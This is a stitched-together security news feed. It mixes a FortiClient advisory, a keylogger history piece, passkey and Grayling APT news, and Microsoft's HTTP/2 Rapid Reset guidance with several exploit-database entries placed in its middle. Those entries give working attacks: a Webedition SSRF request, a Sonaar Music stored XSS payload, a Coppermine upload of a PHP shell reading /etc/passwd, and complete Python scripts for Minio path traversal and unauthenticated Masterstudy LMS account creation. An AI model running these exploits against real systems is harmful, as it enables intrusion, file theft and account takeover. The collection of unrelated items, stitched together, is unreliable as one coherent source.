An exposure of sensitive information to an unauthorized actor vulnerability [CWE-200] in FortiClient for Windows 7.2.0, 7.0 all versions, 6.4 all versions, 6.2 all versions, Linux 7.2.0, 7.0 all versions, 6.4 all versions, 6.2 all versions and Mac 7.2.0 through 7.2.1, 7.0 all versions, 6.4 all versions, 6.2 all versions, may allow a local authenticated attacker with no Administrative privileges to retrieve the list of files or folders excluded from malware scanning.

** PSIRT Advisories**

**FortiClient - Information disclosure of folders to exclude from scanning**

**Summary**

 An exposure of sensitive information to an unauthorized actor vulnerability \[CWE-200\] in FortiClient for Windows, Linux and Mac, may allow a local authenticated attacker with no Administrative privileges to retrieve the list of files or folders excluded from malware scanning.

Version

Affected

Solution

FortiClientMac 7.2

7.2.0 through 7.2.1

Upgrade to 7.2.2 or above

FortiClientMac 7.0

7.0 all versions

Migrate to a fixed release

FortiClientMac 6.4

6.4 all versions

Migrate to a fixed release

FortiClientMac 6.2

6.2 all versions

Migrate to a fixed release

FortiClientWindows 7.2

7.2.0

Upgrade to 7.2.1 or above

FortiClientWindows 7.0

7.0 all versions

Migrate to a fixed release

FortiClientWindows 6.4

6.4 all versions

Migrate to a fixed release

FortiClientWindows 6.2

6.2 all versions

Migrate to a fixed release

FortiClientLinux 7.2

7.2.0

Upgrade to 7.2.1 or above

FortiClientLinux 7.0

7.0 all versions

Migrate to a fixed release

FortiClientLinux 6.4

6.4 all versions

Migrate to a fixed release

FortiClientLinux 6.2

6.2 all versions

Migrate to a fixed release

Follow the recommended upgrade path using our tool at: https://docs.fortinet.com/upgrade-tool

**Acknowledgement**

Fortinet is pleased to thank Alwin Warringa from Ordina for reporting this vulnerability under responsible disclosure.

**Timeline**

2023-10-05: Initial publication

CVE-2023-37939: Fortiguard

Keyloggers have been used for espionage since the days of the typewriter, but today's threats are easier to get and use than ever.

Keyloggers, the often-unseen sentinels of the digital space, silently and meticulously document a user's every tap and keystroke with the objective of harvesting valuable information. While many consider them tools of the cyber elite, it's startling how readily available and easy to use they are today.

Let's explore their lineage, the different kinds that exist, their multiple (good and bad) purposes, and the pressing need for protective measures.

**Historical Keyloggers**

The concept of spying on communication isn't new. But the 1970s, characterized by the ideological tussle between the East and West, offered a unique twist. Soviet engineers developed the Selectric bug to spy on electric typewriters. This ingenious device both underscored the era's espionage intensity and foreshadowed future digital surveillance.

Fast forward to the 1990s, as the tech revolution was reshaping the world. Computers transitioned from huge rooms to desktops. With this, the keylogger evolved too, from tangible devices to sophisticated software programs. In a twist of irony and to acknowledge digital espionage threats, in 2013 the Russian embassies dusted off their old typewriters.

Today's world paints a complex canvas. While keyloggers have become tools to help agencies like the FBI capture criminals, they've also become the weapon of choice for digital pirates and hackers globally.

**Types of Keyloggers**

There are a host of hardware and software devices that can spy on computer keyboard input today.

*   **USB keyloggers:** It's a stark testimony that anyone can purchase a keylogger as easily as they can buy a book. Retailers such as Amazon list these devices camouflaged as innocuous USB drives. While they might seem harmless, they're digital Trojan horses. For example, in 2017 a university student was expelled for using such a hardware keylogger to change academic scores.
*   **Acoustic keyloggers:** Sound, an elemental form of communication, has been weaponized by acoustic keyloggers. Every key on a computer keyboard has a unique sound. By recording and analyzing these sounds, these keyloggers can recreate entire documents. Research labs at University of California, Berkeley, have demonstrated how over 96% of a document's content can be reconstructed from keystroke sounds.
*   **Electromagnetic keyloggers:** Advancing from sound to the electromagnetic spectrum, keyloggers can eavesdrop on keyboards' faint electromagnetic discharges. Finely calibrated receivers can intercept and decode these emissions, even through physical barriers.
*   **Smartphone-based keyloggers:** In this mobile-first era, the array of sensors on mobile phones offer a fertile ground for innovative keylogging methods. By manipulating sensors designed for motion detection, software can decipher typing habits. Reports have unveiled accuracy levels approaching 97% from using smartphone data alone.
*   **Software-based keyloggers:** The 1980s saw the rise of software-based keyloggers. Some were crafted with malicious objectives, while others, such as those embedded in Windows 10, aimed to amplify the user experience through enhanced predictive text abilities. However, the rise of artificial intelligence and voice-activated devices like Amazon's Alexa becoming household staples creates new concerns. Their "always listening" feature has become a contentious topic.

**Ethical Keyloggers**

While the term "keylogger" often conjures negative imagery, many are used for valid, ethical purposes. Examples include enhancing software user experiences, helping parents monitor their children's digital footprints, aiding IT professionals in diagnosing tech issues, and safeguarding communal tech platforms from inappropriate use.

YouTube's vast informational landscape caters to curious minds, offering guidance on myriad subjects, including creating software. These include keylogger tutorials touted for educational enrichment. While they empower and educate genuine learners, they simultaneously risk aiding malicious intent. This duality underscores the need for discerning content consumption and ethical application of knowledge.

**Counteracting the Keylogger Threat**

Knowledge and proactive defense are the watchwords for decreasing your risk of being a keylogger victim. Regularly updating software, using robust two-factor authentication, leveraging virtual keyboards, employing state-of-the-art anti-keylogger tools, and physical examinations can help ward off these digital spies.

From their humble beginnings as tools of geopolitical subterfuge to their current omnipresence in the digital era, keyloggers have charted a dramatic trajectory. As we hurtle into an increasingly digital future, the history of keyloggers serves as a stark reminder of the delicate balance between technology's boons and banes.

How Keyloggers Have Evolved From the Cold War to Today

Webedition CMS version 2.9.8.8 suffers from a blind server-side request forgery vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRFApplication: Webedition CMSVersion: v2.9.8.8   Bugs:  Blind SSRFTechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 07.09.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================write https://youserver/test.xml to we_cmd[0] parameterpoc requestPOST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1Host: localhostContent-Length: 141sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36sec-ch-ua-platform: ""Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/webEdition/index.php?we_cmd[0]=startWEAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300Connection: closewe_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3

Webedition CMS 2.9.8.8 Server-Side Request Forgery

WordPress Sonaar Music plugin version 4.7 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS# Date: 2023-09-05# Exploit Author: Furkan Karaarslan# Category : Webapps# Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php# Version: 4.7 (REQUIRED)# Tested on: Windows/Linux----------------------------------------------------------------------------------------------------1-First install sonar music plugin.2-Then come to the playlist add page. > http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist3-Press the Add new playlist button4-Put a random title on the page that opens and publish the page. > http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist5-This is the published page http://127.0.0.1/wp/wordpress/album_slug/test/6-Let's paste our xss payload in the comment section. Payload: <script>alert("XSS")</script>BingooRequest:POST /wp/wordpress/wp-comments-post.php HTTP/1.1Host: 127.0.0.1Content-Length: 155Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/wp/wordpress/album_slug/test/Accept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: comment_author_email_52c14530c1f3bbfa6d982f304802224a=a%40gmail.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f304802224a=hunter%7C1694109284%7CXGnjFgcc7FpgQkJrAwUv1kG8XaQu3RixUDyZJoRSB1W%7C16e2e3964e42d9e56edd7ab7e45b676094d0b9e0ab7fcec2e84549772e438ba9; wp-settings-time-1=1693936486Connection: closecomment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit=Yorum+g%C3%B6nder&comment_post_ID=13&comment_parent=0&_wp_unfiltered_html_comment=95f4bd9cf5

WordPress Sonaar Music 4.7 Cross Site Scripting

Coppermine Gallery version 1.6.25 remote code execution exploit.

    Exploit Title: coppermine-gallery 1.6.25 RCEApplication: coppermine-galleryVersion: v1.6.25  Bugs:  RCETechnology: PHPVendor URL: https://coppermine-gallery.net/Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zipDate of found: 05.09.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip.$ cat >> test.php <?php echo system('cat /etc/passwd'); ?>$ zip test.zip test.php1. Login to account2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php3. Upload zip file4. Visit to php file   http://localhost/cpg1.6.x-1.6.25/plugins/test.phppoc requestPOST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1Host: localhostContent-Length: 630Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342cConnection: close------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="plugin"; filename="test.zip"Content-Type: application/zipPK�����™b%Wz½µ}(���(�����test.phpUT  �ñòödÓòödux���������<?php echo system('cat /etc/passwd');?>PK�����™b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j�����------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="form_token"50982f2e64a7bfa63dbd912a7fdb4e1e------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="timestamp"1693905214------WebKitFormBoundaryi1AopwPnBYPdzorF--

Coppermine Gallery 1.6.25 Remote Code Execution

Minio version 2022-07-29T19-40-48Z suffers from a path traversal vulnerability.

    # Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal# Date: 2023-09-02# Exploit Author: Jenson Zhao# Vendor Homepage: https://min.io/# Software Link: https://github.com/minio/minio/# Version: Up to (excluding) 2022-07-29T19-40-48Z# Tested on: Windows 10# CVE : CVE-2022-35919# Required before execution: pip install minio,requestsimport urllib.parseimport requests, json, re, datetime, argparsefrom minio.credentials import Credentialsfrom minio.signer import sign_v4_s3class MyMinio():    secure = False    def __init__(self, base_url, access_key, secret_key):        self.credits = Credentials(            access_key=access_key,            secret_key=secret_key        )        if base_url.startswith('http://') and base_url.endswith('/'):            self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'        elif base_url.startswith('https://') and base_url.endswith('/'):            self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'            self.secure = True        else:            print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n')    def poc(self):        datetimes = datetime.datetime.utcnow()        datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')        urls = urllib.parse.urlparse(self.url)        headers = {            'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',            'X-Amz-Date': datetime_str,            'Host': urls.netloc,        }        headers = sign_v4_s3(            method='POST',            url=urls,            region='',            headers=headers,            credentials=self.credits,            content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',            date=datetimes,        )        if self.secure:            response = requests.post(url=self.url, headers=headers, verify=False)        else:            response = requests.post(url=self.url, headers=headers)        try:            message = json.loads(response.text)['Message']            pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)'            matches = re.findall(pattern, message)            if matches:                print('There is CVE-2022-35919 problem with the url!')                print('The contents of the /etc/passwd file are as follows:')                for match in matches:                    print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5],                                                        match[6]))            else:                print('There is no CVE-2022-35919 problem with the url!')                print('Here is the response message content:')                print(message)        except Exception as e:            print(                'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')            print(response.text)if __name__ == '__main__':    parser = argparse.ArgumentParser()    parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/")    parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")    parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")    args = parser.parse_args()    minio = MyMinio(args.url, args.accesskey, args.secretkey)    minio.poc()

Minio 2022-07-29T19-40-48Z Path Traversal

WordPress Masterstudy LMS plugin version 3.0.17 suffers from an unauthenticated instructor account creation vulnerability.

    # Exploit Title:  Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation# Google Dork: inurl:/user-public-account# Date: 2023-09-04# Exploit Author: Revan Arifio# Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/# Version: <= 3.0.17# Tested on: Windows, Linux# CVE : CVE-2023-4278import requestsimport osimport reimport timebanner = """   _______      ________    ___   ___ ___  ____        _  _ ___ ______ ___    / ____\ \    / /  ____|  |__ \ / _ \__ \|___ \      | || |__ \____  / _ \  | |     \ \  / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) |  / / (_) | | |      \ \/ / |  __|______/ /| | | |/ / |__ <______|__   _/ /  / / > _ <  | |____   \  /  | |____    / /_| |_| / /_ ___) |        | |/ /_ / / | (_) |  \_____|   \/   |______|  |____|\___/____|____/         |_|____/_/   \___/                                                                             ======================================================================================================|| Title            : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation       |||| Author           : https://github.com/revan-ar                                                   |||| Vendor Homepage  : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/      |||| Support          : https://www.buymeacoffee.com/revan.ar                                         ||======================================================================================================"""print(banner)# get noncedef get_nonce(target):    open_target = requests.get("{}/user-public-account".format(target))    search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)    if search_nonce[1] != None:        return search_nonce[1]    else:        print("Failed when getting Nonce :p")# privielege escalationdef privesc(target, nonce, username, password, email):    req_data = {        "user_login":"{}".format(username),        "user_email":"{}".format(email),        "user_password":"{}".format(password),        "user_password_re":"{}".format(password),        "become_instructor":True,        "privacy_policy":True,        "degree":"",        "expertize":"",        "auditory":"",        "additional":[],        "additional_instructors":[],        "profile_default_fields_for_register":[],        "redirect_page":"{}/user-account/".format(target)        }    start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)    if start.status_code == 200:        print("[+] Exploit Success !!")    else:        print("[+] Exploit Failed :p")# URL targettarget = input("[+] URL Target: ")print("[+] Starting Exploit")plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))plugin_version = re.search("Stable tag: (.+)", plugin_check.text)int_version = plugin_version[1].replace(".", "")time.sleep(1)if int(int_version) < 3018:    print("[+] Target is Vulnerable !!")    # Credential    email =  input("[+] Email: ")    username =  input("[+] Username: ")    password =  input("[+] Password: ")    time.sleep(1)    print("[+] Getting Nonce...")    get_nonce = get_nonce(target)    # Get Nonce    if get_nonce != None:        print("[+] Success Getting Nonce: {}".format(get_nonce))        time.sleep(1)        # Start PrivEsc        privesc(target, get_nonce, username, password, email)    # ----------------------------------    else:    print("[+] Target is NOT Vulnerable :p")

WordPress Masterstudy LMS 3.0.17 Account Creation

Google on Tuesday announced the ability for all users to set up passkeys by default, five months after it rolled out support for the FIDO Alliance-backed passwordless standard for Google Accounts on all platforms.
"This means the next time you sign in to your account, you'll start seeing prompts to create and use passkeys, simplifying your future sign-ins," Google's Sriram Karra and Christiaan

Password Security / Technology

Google on Tuesday announced the ability for all users to set up passkeys by default, five months after it rolled out support for the FIDO Alliance-backed passwordless standard for Google Accounts on all platforms.

"This means the next time you sign in to your account, you'll start seeing prompts to create and use passkeys, simplifying your future sign-ins," Google's Sriram Karra and Christiaan Brand said.

"It also means you'll see the 'skip password when possible' option toggled on in your Google Account settings."

Passkeys are a new form of authentication that entirely eliminate the need for usernames and passwords, or even provides any additional authentication factor.

In other words, it's a passwordless login mechanism that leverages public-key cryptography to authenticate users' access to websites and apps, with the private key saved securely in the device and the public key stored in the server.

Each passkey is unique and bound to a username and a specific service, meaning a user will have at least as many passkeys as they have accounts, although there can be multiple passkeys per account since passkeys function only within the confines of the same platform.

A user can, therefore, have one passkey each for a website for Android, iOS, and Windows.

Thus, when a user signs into a website or app that supports passkeys, a random challenge is created and sent to the client, which, in turn, prompts the individual to verify using their biometric or a PIN in order to sign the challenge using the private key and send it back to the server.

Authentication is considered successful if the signed response can be validated using the associated public key.

An immediate benefit to passkeys is two-fold: they not only obviate the hassle of remembering passwords, but are also phishing-resistant, thereby safeguarding accounts against potential takeover attacks.

The development comes weeks after Microsoft officially began supporting passkeys in Windows 11 for improved account security. Other widely-used platforms like eBay and Uber have enabled passkey support in recent months.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Adopts Passkeys as Default Sign-in Method for All Users

A previously undocumented threat actor of unknown provenance has been linked to a number of attacks targeting organizations in the manufacturing, IT, and biomedical sectors in Taiwan.
The Symantec Threat Hunter Team, part of Broadcom, attributed the attacks to an advanced persistent threat (APT) it tracks under the name Grayling. Evidence shows that the campaign began in February 2023 and

A previously undocumented threat actor of unknown provenance has been linked to a number of attacks targeting organizations in the manufacturing, IT, and biomedical sectors in Taiwan.

The Symantec Threat Hunter Team, part of Broadcom, attributed the attacks to an advanced persistent threat (APT) it tracks under the name **Grayling**. Evidence shows that the campaign began in February 2023 and continued until at least May 2023.

Also likely targeted as part of the activity is a government agency located in the Pacific Islands, as well as entities in Vietnam and the U.S.

"This activity stood out due to the use by Grayling of a distinctive DLL side-loading technique that uses a custom decryptor to deploy payloads," the company said in a report shared with The Hacker News. "The motivation driving this activity appears to be intelligence gathering."

The initial foothold to victim environments is said to have been achieved by exploiting public-facing infrastructure, followed by the deployment of web shells for persistent access.

The attack chains then leverage DLL side-loading via SbieDll\_Hook to load a variety of payloads, including Cobalt Strike, NetSpy, and the Havoc framework, alongside other tools like Mimikatz. Grayling has also been observed killing all processes listed in a file called processlist.txt.

DLL side-loading is a popular technique used by a variety of threat actors to get around security solutions and trick the Windows operating system into executing malicious code on the target endpoint.

This is often accomplished by placing a malicious DLL with the same name as a legitimate DLL used by an application in a location where it will be loaded before the actual DLL by taking advantage of the DLL search order mechanism.

"The attackers take various actions once they gain initial access to victims' computers, including escalating privileges, network scanning, and using downloaders," Symantec said.

The use of DLL side-loading with respect to SbieDll\_Hook and SandboxieBITS.exe was previously observed in the case of Naikon APT in attacks targeting military organizations in Southeast Asia.

There is no evidence to suggest that the adversary has engaged in any form of data exfiltration to date, suggesting the motives are geared more toward reconnaissance and intelligence gathering.

The use of publicly available tools is seen as an attempt to complicate attribution efforts, while process termination indicates detection evasion as a priority for staying under the radar for extended periods of time.

"The heavy targeting of Taiwanese organizations does indicate that they likely operate from a region with a strategic interest in Taiwan," the company added.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover Grayling APT's Ongoing Attack Campaign Across Industries

Summary Summary Beginning in September 2023, Microsoft was notified by industry partners about a newly identified Distributed Denial-of-Service (DDoS) attack technique being used in the wild targeting HTTP/2 protocol. This vulnerability (CVE-2023-44487) impacts any internet exposed HTTP/2 endpoints. As an industry leader, Microsoft promptly opened an investigation and subsequently began working with industry partners for a coordinated disclosure and mitigation plan.

**Summary Summary**

Beginning in September 2023, Microsoft was notified by industry partners about a newly identified Distributed Denial-of-Service (DDoS) attack technique being used in the wild targeting HTTP/2 protocol. This vulnerability (CVE-2023-44487) impacts any internet exposed HTTP/2 endpoints. As an industry leader, Microsoft promptly opened an investigation and subsequently began working with industry partners for a coordinated disclosure and mitigation plan. Microsoft recommends customers follow the guidance provided in this blog to ensure your services are hardened and protected against this DDoS attack technique.

This DDoS attack, known as ‘HTTP/2 Rapid Reset’, leverages a flaw in the implementation of HTTP/2. Microsoft promptly created mitigations for IIS (HTTP.sys), .NET (Kestrel), and Windows, which were part of Microsoft Security Updates released on Oct 10th, 2023.

While this DDoS has the potential to impact service availability, it alone does _not_ lead to the compromise of customer data, and at this time we have seen no evidence of customer data being compromised.

**Attack Details Attack Details**

This HTTP/2 vulnerability allows malicious actors to launch a DDoS attack targeting HTTP/2 servers. The attack sends a set number of HTTP requests using HEADERS followed by RST\_STREAM and repeating this pattern to generate a high volume of traffic on the targeted HTTP/2 servers. By packing multiple HEADERS and RST\_STREAM frames in a single connection, attackers can cause a significant increase in the request per second and high CPU utilization on the servers that eventually can cause resource exhaustion.

**Protecting your services from CVE-2023-44487 Protecting your services from CVE-2023-44487**

This HTTP DDoS activity is primarily targeted at layer 7 rather than layer 3 or 4. Microsoft hardened layer 7 protections in our web service implementations and patched services to better protect customers from the impact of these DDoS attacks. While these tools and techniques are highly effective at mitigating the majority of disruptions, Microsoft consistently reviews the performance of its hardening capabilities and incorporates learnings into refining and improving their effectiveness.

*   Microsoft services used for hosting web applications have applied security updates to provide mitigations against this attack.
    
*   Microsoft recommends customers that are self-hosting web applications patch web servers/proxies using Windows update or Open-Source Software (OSS) fixes for CVE-2023-44487 as quickly as possible to protect their environments. Affected products requiring customer action have been released in our Microsoft Security Update Guide.
    
*   Microsoft recommends enabling Azure Web Application Firewall (WAF) on Azure Front Door or Azure Application Gateway to further improve security posture. WAF rate limiting rules are effective in providing additional protection against these attacks. Review recommendation section or this blog for more details.
    
*   Microsoft recommends restricting internet access to your web applications where possible.
    
*   If you are unable to apply the appropriate patches and your web application is not protected by WAF on Azure Front Door or Application Gateway, consider disabling HTTP2 on your web services. Please note disabling the HTTP2 protocol in your environment should be a deliberate decision, carefully assessing its potential impact on your products and services, as it can significantly influence performance and user experience.
    

**Recommendations – Layer 7 DDoS Protection Tips Recommendations – Layer 7 DDoS Protection Tips**

Microsoft recommends using layer 7 protection services such as Azure Web Application Firewall (WAF) (available with Azure Front Door, Azure Application Gateway) to protect web applications. Review the following mitigation guidance to reduce the impact of layer 7 DDoS attack: Application DDoS protection.

If using Azure WAF on Azure Front Door or Application Gateway:  

*   Use the bot protection managed rule set provides protection against known bad bots. For more information, see Configuring bot protection on Azure Front Door and Configuring bot protection on Application Gateway.
*   IP addresses and ranges that you identify as malicious should be blocked. For more information, see examples at Create and use custom rules for Azure Front Door and Create and use v2 custom rules for Application Gateway.
*   Traffic from outside a defined geographic region, or within a defined region, should be blocked, rate limited, or redirected to a static webpage. For more information, see examples at Create and use custom rules for Azure Front Door and Create and use v2 custom rules for Application Gateway.
*   Create rate limiting custom rules to automatically block and rate limit HTTP or HTTPS attacks that have known signatures. For more information, see examples at Create rate limiting custom rules for Azure Front Door and Create rate limiting custom rules for Application Gateway.

If using Azure API Management, in addition to fronting with WAF, customers should enable the following configuration:

*   Deploy your API Management instance into Virtual Network and enable DDOS protection
*   Apply L7 rate limit policy to block excessive HTTP traffic.

**Azure and M365 Azure and M365**

Per the Cloud Shared Responsibility Model, Microsoft will be applying the appropriate security updates to the Microsoft managed SaaS and PaaS services as well as IaaS auto patched services using Safe Deployment Practices. Additionally, these services are also protected by DDoS services.  Customers using IaaS services that are on a manual patching are encouraged to apply the updates based on the guidance outlined above.

Microsoft follows Coordinated Vulnerability Disclosure (CVD), which systematically and responsibly manages the discovery, reporting, and remediation of security vulnerabilities. CVD allows us to collaborate with researchers and the wider security community in a way that prioritizes user security and system integrity. By following a coordinated approach, we can work with researchers and industry partners to ensure that potential vulnerabilities are addressed before they’re made public, reducing the risk of exploitation.

Part of any robust security posture is working with researchers to help find vulnerabilities, so we can fix any findings before details of the vulnerabilities are broadly available and misused. We want to thank Amazon, Cloudflare, and Google who reported this vulnerability under Coordinated Vulnerability Disclosure (CVD). We also want to thank the partners in the open-source community that worked with the Microsoft Security Response Center (MSRC) to develop fixes and help keep Microsoft customers safe.

**References References**

*   Application DDoS protection - Azure Web Application Firewall | Microsoft Learn
*   DDoS Mitigation with Microsoft Azure Front Door | Azure Blog | Microsoft Azure
*   2022 in review: DDoS attack trends and insights | Microsoft Security Blog
*   Joint CISA FBI MS-ISAC Guide on Responding to DDoS Attacks and DDoS Guidance for Federal Agencies | CISA

Tag

#windows